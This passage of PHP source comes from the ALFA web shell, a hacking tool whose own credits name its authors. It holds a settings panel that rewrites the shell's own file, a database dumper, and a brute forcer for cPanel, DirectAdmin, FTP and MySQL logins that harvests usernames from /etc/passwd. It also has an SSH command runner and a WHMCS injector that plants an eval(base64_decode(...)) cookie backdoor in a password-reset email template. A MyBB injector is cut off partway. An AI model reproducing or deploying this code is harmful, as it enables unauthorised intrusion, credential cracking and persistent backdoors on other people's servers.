  2162. echo '<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">'.$protect_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">'.$postEnc_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">'.$icon_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">'.$login_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="'.(empty($_POST['alfa3'])?$GLOBALS['DB_NAME']['user']:$_POST['alfa3']).'" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="'.$GLOBALS['DB_NAME']['safemode'].'"><input type="hidden" name="s" value="'.$GLOBALS['DB_NAME']['show_icons'].'"><p><input type="submit" name="btn" value=" "></p></form></center>';
  2163. if($_POST['alfa5']=='>>'){
  2164. echo __pre();
  2165. if(!empty($_POST['alfa3'])){
  2166. $protect = $_POST['alfa1'];
  2167. $lgpage = $_POST['alfa2'];
  2168. $username = $_POST['alfa3'];
  2169. $password = md5($_POST['alfa4']);
  2170. $icon = $_POST['alfa6'];
  2171. $post_encrypt = $_POST['alfa7'];
  2172. @chdir($GLOBALS['home_cwd']);
  2173. $basename = @basename($_SERVER['PHP_SELF']);
  2174. $data = @file_get_contents($basename);
  2175. $find_user = '/\'user\'(.*?),/i';
  2176. $find_pw = '/\'pass\'(.*?),/i';
  2177. $find_lg = '/\'login_page\'(.*?),/i';
  2178. $find_p = '/\'safemode\'(.*?),/i';
  2179. $icons = '/\'show_icons\'(.*?),/i';
  2180. $postEnc = '/\'post_encryption\'(.*?),/i';
  2181. if(!empty($username)&&preg_match($find_user,$data,$e)){
  2182. $new = '\'user\' => \''.$username.'\',';
  2183. $data = str_replace($e[0],$new,$data);
  2184. }
  2185. if(!empty($_POST['alfa4'])&&preg_match($find_pw,$data,$e)){
  2186. $new = '\'pass\' => \''.$password.'\',';
  2187. $data = str_replace($e[0],$new,$data);
  2188. }
  2189. if(!empty($lgpage)&&preg_match($find_lg,$data,$e)){
  2190. $new = '\'login_page\' => \''.$lgpage.'\',';
  2191. $data = str_replace($e[0],$new,$data);
  2192. }
  2193. if(!empty($find_p)&&preg_match($find_p,$data,$e)){
  2194. $new = '\'safemode\' => \''.$protect.'\',';
  2195. $data = str_replace($e[0],$new,$data);
  2196. }
  2197. if(preg_match($icons,$data,$e)){
  2198. $new = '\'show_icons\' => \''.$icon.'\',';
  2199. $data = str_replace($e[0],$new,$data);
  2200. }
  2201. if(preg_match($postEnc,$data,$e)){
  2202. $new = '\'post_encryption\' => '.$post_encrypt.',';
  2203. $data = str_replace($e[0],$new,$data);
  2204. }
  2205. if(@file_put_contents($basename,$data)){
  2206. echo '<b>UserName: </b><font color="green"><b>'.$username.'</b></font><br /><b>Password: </b><font color="green"><b>'.$_POST['alfa4'].'</b></font><script>post_encryption_mode = '.$post_encrypt.';</script>';
  2207. }else{
  2208. __alert("<span style='color:red;'>File has no edit access...!</span>");
  2209. }
  2210. }else{
  2211. __alert("<span style='color:red;'>UserName is Empty !</span>");
  2212. }
  2213. }
  2214. }elseif($_POST["alfa8"] == "color"){
  2215. echo('<center><p><div class="txtfont_header">| Custom Color |</div></p><form onSubmit="reloadColors();return false;" method=\'post\'>');
  2216. echo '<table border="1"><tbody>';
  2217. $template = '<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>';
  2218. $x = 1;
  2219. foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
  2220.     $multi = "";
  2221.     if(is_array($value)){
  2222.         if(isset($value["multi_selector"])){
  2223.             $multi = __ZW5jb2Rlcg(json_encode($value));
  2224.         }
  2225.     }
  2226.     $value = alfa_getColor($key);
  2227.     $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));
  2228.     echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);
  2229. }
  2230. echo '<tr><td style="text-align:center;">-</td><td style="text-align:center;"><div class="tbltxt">*</div></td><td><div style="margin-left:5px;" class="tbltxt">Use Default Color:</div></td><td></td><td><center><input type="checkbox" id="use_default_color" value="1"></center></td></tr>';
  2231.  
  2232. echo '</tbody></table><p><input type="submit" name="btn" value=" "></p></form><p><button style="padding:4px;;margin-right:20px;" onclick="$(\'importFileBtn\').click();" class="button"> Import </button> <button style="padding:4px;margin-left:20px;" onclick="g(\'settings\',null,null,null,null,null,null,null,\'export\',\'color\')" class="button"> Export </button></center></p>';
  2233. if($_POST['alfa7']=='export'){
  2234.     echo __pre();
  2235.     $colors = is_array($GLOBALS["DB_NAME"]["color"])?$GLOBALS["DB_NAME"]["color"]:array();
  2236.     $glob_colors = $GLOBALS["__ALFA_COLOR__"];
  2237.     $array = array();
  2238.     foreach($glob_colors as $k => $v){
  2239.         if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
  2240.             $v = trim($colors[$k]);
  2241.         }else{
  2242.             $v = trim(is_array($v)?$v["key_color"]:$v);
  2243.         }
  2244.         $array[$k] = $v;
  2245.     }
  2246.     $file = "alfa_color_config_".date('Y-m-d-h_i_s').".conf";
  2247.     $config = json_encode($array, JSON_PRETTY_PRINT);
  2248.     if(!@file_put_contents($file, $config)){
  2249.         echo('<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">'.$config.'</textarea></center></p>');
  2250.     }else{
  2251.         echo('<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$file.'\', \'download\')"><font color="#0F0">Download Config</font></a></center></p></h3>');
  2252.     }
  2253. }
  2254. if($_POST['alfa2']=='>>'){
  2255.     echo __pre();
  2256.     $colors = json_decode($_POST["alfa1"],true);
  2257.     $array = "";
  2258.     $is_default = isset($_POST["alfa3"])&&$_POST["alfa3"]=="1"?true:false;
  2259.     $glob_colors = $GLOBALS["__ALFA_COLOR__"];
  2260.     foreach($glob_colors as $k => $v){
  2261.         if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
  2262.             $v = trim($colors[$k]);
  2263.         }else{
  2264.             $v = trim(is_array($v)?$v["key_color"]:$v);
  2265.         }
  2266.         $array .= '"'.trim($k).'" => "'.$v.'",';
  2267.     }
  2268.     @chdir($GLOBALS['home_cwd']);
  2269.     $basename = @basename($_SERVER['PHP_SELF']);
  2270.     $data = @file_get_contents($basename);
  2271.     $color = '/\'color\'(.*?)\),/s';
  2272.     if(preg_match($color,$data,$e)){
  2273.         $new = "'color' => array(".$array."),";
  2274.         $data = str_replace($e[0],$new,$data);
  2275.         if(@file_put_contents($basename, $data)){
  2276.             echo("<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>");
  2277.         }else{
  2278.             echo("<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>");
  2279.         }
  2280.     }else{
  2281.         echo("<center><p><h3>[-] Error...!</h3></p></center>");
  2282.     }
  2283. }
  2284. }
  2285. echo('</div>');
  2286. alfafooter();
  2287. }
  2288. function alfaplus(){
  2289. alfahead();
  2290. echo '<div class="header"><center><p><div class="txtfont_header">| Alfa + |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'plus\',null,\'news\');">| News | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'tools\')">| Tools | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'about\')">| About Us | </a></h3></center>';
  2291. if($_POST['alfa1']=='news'||$_POST['alfa1']=='tools'){
  2292. try{
  2293. $s1 = 'http://solevisible.com/'.($_POST['alfa1']=='news'?'news.php':'tools.php');
  2294. $msg = "<center><font color='red'><b><p>Can`t Connect to Remote Server ...!<br>Please Try Again Later...!</p></b></font></center>";
  2295. $news = new AlfaCURL();
  2296. if($news->Send($s1)){
  2297. $xml = $news->Send($s1);
  2298. }else{
  2299. $xml = false;
  2300. }
  2301. if($xml){
  2302. if(@simplexml_load_string($xml)){
  2303. $doc = new DOMDocument;
  2304. $doc->loadXML($xml);
  2305. $data = $doc->getElementsByTagName('data')->item(0);
  2306. $items = $data->getElementsByTagName('item');
  2307. foreach($items as $item){
  2308. $title = $item->getElementsByTagName('title')->item(0)->nodeValue;
  2309. $description = $item->getElementsByTagName('description')->item(0)->nodeValue;
  2310. $link = $item->getElementsByTagName('link')->item(0)->nodeValue;
  2311. $pubDate = $item->getElementsByTagName('pubDate')->item(0)->nodeValue;
  2312. echo(__pre()."<center><a href='$link' target='_blank'>$title</a><br>$description<br><small><font  color='#FFFFFF'><b>Date: $pubDate</b></font></small></center></pre>");
  2313. }
  2314. }else{
  2315. echo($msg);
  2316. }
  2317. }else{
  2318. echo($msg);
  2319. }
  2320. }catch(Exception $e){
  2321. echo $e->getMessage();
  2322. }}elseif($_POST['alfa1']=='about'){
  2323. echo __pre()."<pre><center><img src='http://solevisible.com/images/farvahar-iran.png'><br>
  2324. <b><font size='+3' color='#00A220'>&#9774; ~ PEACE ~ &#9774;</font><br><b>
  2325. <font color='#00A220'>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br>
  2326. <font color='#00A220'>Contact : solevisible@gmail.com</font><br>
  2327. <font color='#00A220'>Telegram Channel: @solevisible</font><br>
  2328. <font color='#FFFFFF'>Skype : ehsan.invisible</font><br>
  2329. <font color='#FFFFFF'>Skype : sole.sad</font><br>
  2330. <font color='#FF0000'>Persian Gulf For Ever</font><br>
  2331. <font color='#FF0000'>Iranian Hackers :)</font><br>
  2332. <font color='#FF0000'>Our Friends : Mr.PERSIA , R3veC0der</font><br>
  2333. </center></pre><iframe src='tg://resolve?domain=solevisible' frameborder='0' width='0' height='0'></iframe>";
  2334. }
  2335. echo('</div>');
  2336. alfafooter();
  2337. }
  2338. function alfaDumper(){
  2339. alfahead();
  2340. echo('<div class="header">');
  2341. AlfaNum(8,9,10);
  2342. echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;\"><p>";
  2343. $table = array('td1' =>
  2344.  array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  2345.  'td2' =>
  2346.  array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  2347.  'td3' =>
  2348.  array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
  2349.  'td4' =>
  2350.  array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  2351.  'td5' =>
  2352.  array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']).'alfa.sql', 'inputSize' => '50')
  2353. );
  2354. create_table($table);
  2355. echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
  2356. $username = ($_POST['alfa3']);
  2357. $password = ($_POST['alfa4']);
  2358. $dbname = ($_POST['alfa5']);
  2359. $dfile = ($_POST['alfa6']);
  2360. $host = ($_POST['alfa7']);
  2361. if(!empty($dbname)){
  2362. echo __pre();
  2363. $msg = "<center>Check this :  <font color='red'>".$dfile."</font></center>";
  2364. if(@mysqli_connect($host,$username,$password,$dbname)){
  2365. if(strlen(alfaEx("mysqldump"))>0){
  2366. alfaEx("mysqldump --single-transaction --host=\"$host\" --user=\"$username\" --password=\"$password\" $dbname > '".addslashes($dfile)."'");
  2367. echo($msg);
  2368. }else{
  2369. __alert("Error...!");
  2370. }
  2371. }else{
  2372. echo('<center>mysqli_connect : Error!</center>');
  2373. }
  2374. }
  2375. echo('</div>');
  2376. alfafooter();
  2377. }
  2378. function Alfa_DirectAdmin_Cracker($info){
  2379. if(!$info['mysql'])
  2380. $url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';
  2381. else $url = $info['protocol'].$info['target'].'/phpmyadmin';
  2382. $curl = curl_init();
  2383. curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
  2384. curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
  2385. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
  2386. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
  2387. curl_setopt($curl, CURLOPT_HEADER,0);
  2388. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2389. curl_setopt($curl, CURLOPT_URL,$url);
  2390. curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);
  2391. if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
  2392. $result = curl_exec($curl);
  2393. $curl_errno = curl_errno($curl);
  2394. $curl_error = curl_error($curl);
  2395. if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
  2396. elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){
  2397. echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green">  Login Success....</font><br>';
  2398. $info['target'] = $url;
  2399. CrackerResualt($info);
  2400. }
  2401. curl_close($curl);
  2402. }
  2403. function Alfa_CP_Cracker($info){
  2404. $url = $info['protocol'].$info['target'].':'.$info['port'];
  2405. $curl = curl_init();
  2406. curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
  2407. curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
  2408. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
  2409. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
  2410. curl_setopt($curl, CURLOPT_HEADER,0);
  2411. curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
  2412. curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r"));
  2413. curl_setopt($curl, CURLOPT_URL, $url);
  2414. $result = curl_exec($curl);
  2415. $curl_errno = curl_errno($curl);
  2416. $curl_error = curl_error($curl);
  2417. if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
  2418. elseif(preg_match('/filemanager/i',$result)){
  2419. echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green">  Login Success....</font><br>';
  2420. $info['target'] = $url;
  2421. CrackerResualt($info);
  2422. }
  2423. curl_close($curl);
  2424. }
  2425. function Alfa_FTP_Cracker($info){
  2426. $url = $info['protocol'].$info['target'];
  2427. $curl = curl_init();
  2428. curl_setopt($curl, CURLOPT_URL, $url);
  2429. curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
  2430. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2431. curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password']."");
  2432. $result = curl_exec($curl);
  2433. $curl_errno = curl_errno($curl);
  2434. $curl_error = curl_error($curl);
  2435. if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
  2436. elseif(preg_match('/(\d+):(\d+)/i',$result)){
  2437. echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green">  Login Success....</font><br>';
  2438. $info['target'] = $url;
  2439. CrackerResualt($info);
  2440. }
  2441. curl_close($curl);
  2442. }
  2443. function Alfa_Mysql_Cracker($info){
  2444. if(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){
  2445. CrackerResualt($info);
  2446. echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green">  Login Success....</font><br>';
  2447. }
  2448. }
  2449. function Alfa_FTPC($info){
  2450. if($con=@ftp_connect($info['target'],$info['port'])){
  2451. if($con){
  2452. $login=@ftp_login($con,$info['username'],$info['password']);
  2453. if($login){CrackerResualt($info);}}}
  2454. @ftp_close($con);
  2455. }
  2456. function CrackerResualt($info){
  2457. $res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ;
  2458. $c = @fopen($info['fcrack'],'a+');
  2459. @fwrite($c, $res);
  2460. @fclose($c);
  2461. }
  2462. function Alfa_Call_Function_Cracker($method,$info){
  2463. switch($method){case 'cp':return Alfa_CP_Cracker($info);break;case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);break;case 'ftp':return Alfa_FTP_Cracker($info);break;case 'mysql':return Alfa_Mysql_Cracker($info);break;case 'mysql':return Alfa_FTPC($info);break;}
  2464. }
  2465. function alfaCrackers(){
  2466. alfahead();
  2467. AlfaNum(9,10);
  2468. echo '<div class="header"><center><br><div class="txtfont_header">| Brute Forcer |</div><br><br><form method="post" onsubmit="g(\'Crackers\',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,\'start\',this.protocol.value,this.loginpanel.value);return false;"><div class="txtfont">Login Page: <select onclick="dis_input(this.value);" name="loginpanel">';
  2469. foreach(array('cp'=>'Cpanel','direct'=>'DirectAdmin','ftp'=>'FTP','phpmyadmin'=>'PhpMyAdmin[DirectAdmin]','mysql'=>'mysql_connect()','ftpc'=>'ftp_connect()') as $key=>$val)echo('<option value="'.$key.'">'.$val.'</option>');
  2470. echo '</select> Protocol: <select id="protocol" name="protocol">';
  2471. foreach(array('https://','http://','ftp://') as $val)echo('<option value="'.$val.'">'.$val.'</option>');
  2472. echo '</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">
  2473. Port: <input id="port" type="text" name="port" value="2083">
  2474. <table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>
  2475. <textarea placeholder="Users" rows="20" cols="25" name="usernames">'.($GLOBALS['sys']=='unix'?alfaEx("cut -d: -f1 /etc/passwd"):"").'</textarea>
  2476. &nbsp <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>
  2477. Save Result Into File <input type="text" name="fcrack" value="cracked.txt">
  2478. <p><input type="submit" name="cracking" value=" " /></div></form></p><center>';
  2479. $target = str_replace(array('https://','http://','ftp://'),'',$_POST['alfa1']);
  2480. $port = $_POST['alfa2'];
  2481. $usernames= $_POST['alfa3'];
  2482. $passwords = $_POST['alfa4'];
  2483. $fcrack = $_POST['alfa5'];
  2484. $cracking = $_POST['alfa6'];
  2485. $protocol = $_POST['alfa7'];
  2486. $loginpanel = $_POST['alfa8'];
  2487. $p = $loginpanel == 'phpmyadmin' ? $p = true : false;
  2488. if($cracking=='start'){
  2489. echo __pre();
  2490. $exuser = explode("\n",$usernames);
  2491. $expw = explode("\n",$passwords);
  2492. foreach($exuser as $user){
  2493. foreach($expw as $pw){
  2494. $array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);
  2495. Alfa_Call_Function_Cracker($loginpanel,$array);
  2496. }
  2497. }
  2498. echo '<br><font color="red">Attack Finished...</font>';
  2499. }
  2500. echo '</div>';
  2501. alfafooter();
  2502. }
  2503. function alfassh2(){
  2504. if(function_exists('ssh2_connect')){
  2505. $_SESSION['connected']= false;
  2506. $ssh_ip = $_POST['alfa1'];
  2507. $ssh_login = $_POST['alfa2'];
  2508. $ssh_pass = $_POST['alfa3'];
  2509. $ssh_port = $_POST['alfa4'];
  2510. $ssh_command = $_POST['alfa5'];
  2511. if($alfaconnect2ssh=@ssh2_connect($ssh_ip, $ssh_port))
  2512. {
  2513. if($alfalogin=@ssh2_auth_password($alfaconnect2ssh, $ssh_login, $ssh_pass))
  2514. {
  2515. $_SESSION['connected']= true;
  2516. }
  2517. }
  2518. if($_SESSION['connected']!== true){
  2519. alfahead();
  2520. echo "<div class=header>";
  2521. echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,this.ssh_ip.value,this.ssh_login.value,this.ssh_pass.value,this.ssh_port.value); return false;'><table cellpadding='2' cellspacing='0'><tr><td><font color=\"#ffffff\"><b>IP</b></font></td><td><font color=\"#ffffff\"><b>SSH USER</b></font></td><td><font color=\"#ffffff\"><b>SSH PASS</b></font></td><td><font color=\"#ffffff\"><b>SSH PORT</b></font></td><td></td></tr><tr><td><input type=text name=ssh_ip value=''></td><td><input type=text name=ssh_login value=''></td><td><input type=text name=ssh_pass value=''></td><td><input type=text name=ssh_port value=''></td><td><input type='submit' name='submit' value=' '></td></table></form></div>";
  2522. alfafooter();
  2523. }
  2524. if($_SESSION['connected']==true){
  2525. alfahead();
  2526. echo "<div class=header>";
  2527. echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,\"".$ssh_ip."\",\"".$ssh_login."\",\"".$ssh_pass."\",\"".$ssh_port."\",this.ssh_command.value,\">>\"); return false;'><table cellpadding='2' cellspacing='0'><tr><td><input type=text name=ssh_command value=''></td><td><input type='submit' name='execute' value=' '></td></table></form><form name='ssh2' method='post' onsubmit='g(\'ssh2\',null,\'\',\'\',\'\'); return false;'><input type=submit name='destsession' value='logout'></form>";
  2528. $alfastream = ssh2_exec($alfaconnect2ssh, $ssh_command);
  2529. stream_set_blocking($alfastream,true);
  2530. $output = ssh2_fetch_stream($alfastream,SSH2_STREAM_STDIO);
  2531. if($_POST['alfa6']=='>>'){
  2532. echo '<pre class=ml1>';
  2533. ob_start();
  2534. echo  stream_get_contents($output);
  2535. echo htmlspecialchars(ob_get_clean());
  2536. }
  2537. echo "</div>";
  2538. alfafooter();
  2539. }}else{
  2540. alfahead();
  2541. echo '<div class=header><p><center><b><font color="red">Server does not support SSH2</font><p></b></center></div>';
  2542. alfafooter();
  2543. }
  2544. }
  2545. function output($string){ echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$string."'>Click Here !</a></font></b></center><br><br>";}
  2546. function alfaShellInjectors(){
  2547. alfahead();
  2548. echo '<div class=header>';
  2549. AlfaNum(11);
  2550. echo '<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,\'whmcs\',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,\'mybb\')">| MyBB | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,null,\'vb\')">| vBulletin |</a></h3></center>';
  2551. $selector = '<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>';
  2552. if(isset($_POST['alfa1']) && $_POST['alfa1']== 'whmcs'){
  2553. AlfaNum();
  2554. echo __pre()."<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>".getConfigHtml('whmcs')."</p><form onSubmit=\"g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\" method='post'>";
  2555. $table = array('td1' =>
  2556.  array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
  2557.  'td2' =>
  2558.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  2559.  'td3' =>
  2560.  array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  2561.  'td4' =>
  2562.  array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  2563.  'td5' =>
  2564.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
  2565. );
  2566. create_table($table);
  2567. echo $selector;
  2568. echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>";
  2569. if(isset($_POST['alfa6'])) {
  2570. $dbu = $_POST['alfa6'];
  2571. $dbn = $_POST['alfa7'];
  2572. $dbp = $_POST['alfa8'];
  2573. $dbh = $_POST['alfa9'];
  2574. $path = $_POST['alfa10'];
  2575. $method = $_POST['alfa4'];
  2576. $index = "{php}".ALFA_UPLOADER.";{/php}";
  2577. $newin = str_replace("'","\'",$index);
  2578. $newindex = "<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}";
  2579. if(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){
  2580. if(filter_var($path,FILTER_VALIDATE_URL)){
  2581. $conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
  2582. $soleSave= mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
  2583. $soleGet = mysqli_fetch_assoc($soleSave);
  2584. $tempSave1 = $soleGet['message'];
  2585. $tempSave = str_replace("'","\'",$tempSave1);
  2586. $inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'";
  2587. $result = mysqli_query($conn,$inject) or die (mysqli_error($conn));
  2588. $create = "insert into tblclients (email) values('solevisible@fbi.gov')";
  2589. $result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));
  2590. if(function_exists('curl_version') && $method == 'auto'){
  2591. $AlfaSole = new AlfaCURL(true);
  2592. $saveurl = $AlfaSole->Send($path."/pwreset.php");
  2593. $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
  2594. $AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
  2595. $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
  2596. $Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
  2597. __alert("shell injectet...");
  2598. $ff= 'http://'.$path."/solevisible.php";
  2599. output($ff);}else{
  2600. echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target => </font><a href='".$path."/pwreset.php' target='_blank'>".$path."/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color='#FFFFFF'>And Go To => </font><a href='".$path."/solevisible.php' target='_blank'>".$path."/solevisible.php</a></b></center><br><br>";}}else{__alert('Path is not Valid...');}}}
  2601. }if(isset($_POST['alfa2']) && $_POST['alfa2']== 'mybb'){
  2602. AlfaNum(1,2,3,5);
  2603. echo __pre()."<p><div class='txtfont_header'>| MyBB |</div></p><center><center>".getConfigHtml("mybb")."<form id='sendajax' onSubmit=\"g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\" method=POST>
  2604. ";
  2605. $table = array('td1' =>
  2606.  array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
  2607.  'td2' =>
  2608.  array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id'=>'db_name' ,'inputValue' => '', 'inputSize' => '50'),
  2609.  'td3' =>
  2610.  array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id'=>'db_user', 'inputValue' => '', 'inputSize' => '50'),
  2611.  'td4' =>
  2612.  array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id'=>'db_pw', 'inputValue' => '', 'inputSize' => '50'),
  2613.  'td5' =>
  2614.  array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id'=>'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50')
  2615. );
  2616. create_table($table);
  2617. echo $selector;
  2618. echo "<p><input type=submit value=' '></p></form></center></center>";
  2619. if(isset($_POST['alfa6'])) {
  2620. $dbu = $_POST['alfa6'];
  2621. $dbn = $_POST['alfa7'];
  2622. $dbp = $_POST['alfa8'];
  2623. $dbh = $_POST['alfa9'];
